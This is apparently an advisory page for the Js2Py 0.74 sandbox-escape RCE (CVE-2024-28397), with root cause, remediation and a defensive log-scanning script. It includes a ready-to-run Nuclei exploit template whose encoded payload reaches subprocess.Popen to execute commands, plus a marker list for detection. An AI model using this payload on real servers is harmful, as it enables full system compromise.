[webapps] Js2Py 0.74 - RCE
CVE-2024-28397
Js2Py 0.74 contains a sandbox escape in its code generation that leads to arbitrary Python code execution.
Critical · CVSS 9.8
📋 Basic vulnerability information
| CVE | CVE-2024-28397 |
|---|---|
| Vulnerability type | Sandbox escape / RCE |
| Affected versions | Js2Py 0.74 |
| Severity | Critical · CVSS 9.8 |
| Published | 2026-04-30 |
| Source | Exploit-DB original ↗ |
🔬 Root cause
When Js2Py translates JavaScript into Python code, it does not effectively filter dangerous function names such as `__import__`, `eval` and `exec`. An attacker can therefore craft special JavaScript (for example `eval.__proto__`) so that the generated Python code executes arbitrary Python statements.
🎯 Attack scenario
1. The attacker prepares a piece of malicious JavaScript, for example `eval.__proto__.__proto__.__proto__['__import__']('os').system('id')`.
2. The attacker passes this code as input to a Js2Py conversion function (such as `js2py.eval_js`).
3. Js2Py generates the corresponding Python code, in which the malicious call is translated directly into Python's `__import__` and `system` calls.
4. The `id` command is finally executed on the server and the attack succeeds.
💥 Impact
Remote code execution (RCE): the attacker gains full control of the server and can run arbitrary system commands, leading to data leakage, service outage or lateral movement.
⚔️ Nuclei exploit template
The following is an exploitation template in standard Nuclei v3 format that can be used directly for vulnerability verification:
```yaml
id: CVE-2024-28397-exploit

info:
  name: Js2Py <= 0.74 RCE Exploit
  author: Ali Sünbül (xeloxa), converted to nuclei template by [Your Name]
  severity: critical
  description: Exploits CVE-2024-28397 to execute arbitrary commands on the target.

variables:
  cmd: "id"
  url: "{{BaseURL}}"

http:
  - method: POST
    path:
      - "{{url}}"
    headers:
      Content-Type: application/x-www-form-urlencoded
    body: |
      input=var%20output%20%3D%20%22%22%3Btry%20%7Bvar%20leaked_wrapper%20%3D%20Object.getOwnPropertyNames(%7B%7D)%3Bvar%20object_class%20%3D%20leaked_wrapper.__getattribute__(%22__class__%22).__base__%3Bfunction%20find_popen(cls)%20%7Bvar%20subs%20%3D%20cls.__subclasses__()%3Bfor%20(var%20i%20%3D%200%3B%20i%20%3C%20subs.length%3B%20i%2B%2B)%20%7Bvar%20item%20%3D%20subs%5Bi%5D%3Btry%20%7Bif%20(item.__module__%20%3D%3D%20%22subprocess%22%20%26%26%20item.__name__%20%3D%3D%20%22Popen%22)%20%7Breturn%20item%3B%7D%7Dcatch(e)%20%7B%7Dif%20(item.__name__%20!%3D%20%22type%22)%20%7Btry%20%7Bvar%20result%20%3D%20find_popen(item)%3Bif%20(result)%20return%20result%3B%7Dcatch(e)%20%7B%7D%7D%7Dreturn%20null%3B%7Dvar%20Popen%20%3D%20find_popen(object_class)%3Bif%20(Popen)%20%7Bvar%20res%20%3D%20Popen(%22{{cmd}}%22%2C%20-1%2C%20null%2C%20-1%2C%20-1%2C%20-1%2C%20null%2C%20null%2C%20true).communicate()%3Boutput%20%3D%20res%3B%7D%20else%20%7Boutput%20%3D%20%22Error%3A%20Could%20not%20find%20subprocess.Popen%22%3B%7D%7Dcatch(e)%20%7Boutput%20%3D%20%22Error%22%3B%7Doutput
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "uid="
          - "root"
          - "gid="
        condition: or
      - type: status
        status:
          - 200
```
🔍 Nuclei detection template
The following is a detection template for determining whether a target is affected:
```yaml
id: CVE-2024-28397-detection

info:
  name: Js2Py <= 0.74 Sandbox Escape Detection
  author: Ali Sünbül (xeloxa), converted to nuclei template by [Your Name]
  severity: critical
  description: Detects if the target is running a version of Js2Py vulnerable to CVE-2024-28397.

http:
  - method: POST
    path:
      - "{{BaseURL}}"
    headers:
      Content-Type: application/x-www-form-urlencoded
    body: |
      input=var%20output%20%3D%20%22test%22%3Btry%20%7Bvar%20leaked_wrapper%20%3D%20Object.getOwnPropertyNames(%7B%7D)%3Bvar%20object_class%20%3D%20leaked_wrapper.__getattribute__(%22__class__%22).__base__%3Bvar%20subs%20%3D%20object_class.__subclasses__()%3Boutput%20%3D%20%22vulnerable%22%3B%7Dcatch(e)%7Boutput%3De.message%3B%7Doutput
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "vulnerable"
      - type: status
        status:
          - 200
```
🛡️ Remediation
Upgrade to Js2Py 0.75 or later, which fixes the filtering mechanism for dangerous function names. Temporary mitigation: run Js2Py in an isolated sandbox environment and restrict its network and file-system access.
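As an added defensive example, not part of the original advisory or of the Js2Py project, the Python below gives a log-side check to pair with the mitigations above: it decodes captured request bodies and flags JavaScript that references the Python object-model names (`__getattribute__`, `__class__`, `__base__`, `__subclasses__`, `__import__` and similar) that the sandbox escape relies on and that legitimate JavaScript has no reason to use. It generalizes beyond the templates on this page in that it matches on those names rather than on one particular payload chain. It assumes the JavaScript arrives in a form-encoded `input` parameter, as in the templates above, and that request bodies are available from an access log or WAF tap; the sample bodies are constructed.

```python
"""Flag Js2Py sandbox-escape attempts (CVE-2024-28397) in captured request bodies.

Added example, not code from the advisory or from Js2Py. Assumes the application
takes user JavaScript in a form-encoded ``input`` parameter (as the advisory's
Nuclei templates do) and that request bodies are available for inspection.
"""
import re
from urllib.parse import parse_qs

# Python internals that have no meaning in JavaScript. Any of them appearing in
# input bound for js2py signals an attempt to walk from a leaked wrapper object
# into the interpreter, which is the mechanism the sandbox escape depends on.
ESCAPE_MARKERS = (
    "__getattribute__",
    "__class__",
    "__base__",
    "__subclasses__",
    "__import__",
    "__builtins__",
    "__globals__",
)
_MARKER_RE = re.compile("|".join(re.escape(m) for m in ESCAPE_MARKERS))


def decode_js_input(body: str, param: str = "input") -> str:
    """Return the URL-decoded JavaScript carried in the given form parameter."""
    fields = parse_qs(body, keep_blank_values=True)
    return fields.get(param, [""])[0]


def find_escape_indicators(js_source: str) -> list[str]:
    """Return the distinct escape markers present, in order of first appearance."""
    seen: list[str] = []
    for match in _MARKER_RE.finditer(js_source):
        if match.group(0) not in seen:
            seen.append(match.group(0))
    return seen


def is_suspicious(body: str) -> bool:
    """True when the decoded JavaScript references any Python-internal name."""
    return bool(find_escape_indicators(decode_js_input(body)))


# Constructed sample bodies (not captured traffic). "benign" is ordinary
# JavaScript; "probe" has the shape of the advisory's detection payload.
SAMPLE_BODIES = {
    "benign": "input=var%20total%20%3D%200%3B%20for%20(var%20i%3D0%3Bi%3C3%3Bi%2B%2B)%20total%2B%3Di%3B%20total",
    "probe": "input=var%20w%20%3D%20Object.getOwnPropertyNames(%7B%7D)%3B"
             "var%20c%20%3D%20w.__getattribute__(%22__class__%22).__base__%3Bc.__subclasses__()",
}


def triage(bodies: dict[str, str]) -> dict[str, list[str]]:
    """Map each sample name to the markers found in it (empty list means clean)."""
    return {name: find_escape_indicators(decode_js_input(b)) for name, b in bodies.items()}


if __name__ == "__main__":
    for name, markers in triage(SAMPLE_BODIES).items():
        verdict = "ALERT" if markers else "ok"
        print(f"{name:7s} {verdict:5s} {markers}")
```

The check is a detection signal, not a fix: it tells you that someone is probing an endpoint that hands user JavaScript to js2py, which is the cue to upgrade and to confirm the process is confined as described above. `__proto__` is deliberately not on the list because ordinary JavaScript uses it legitimately.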
📎 References
⚠️ This article is based on public vulnerability databases and is provided for security research and defensive reference only. Generated: 2026-05-07 05:30 | Source: Exploit-DB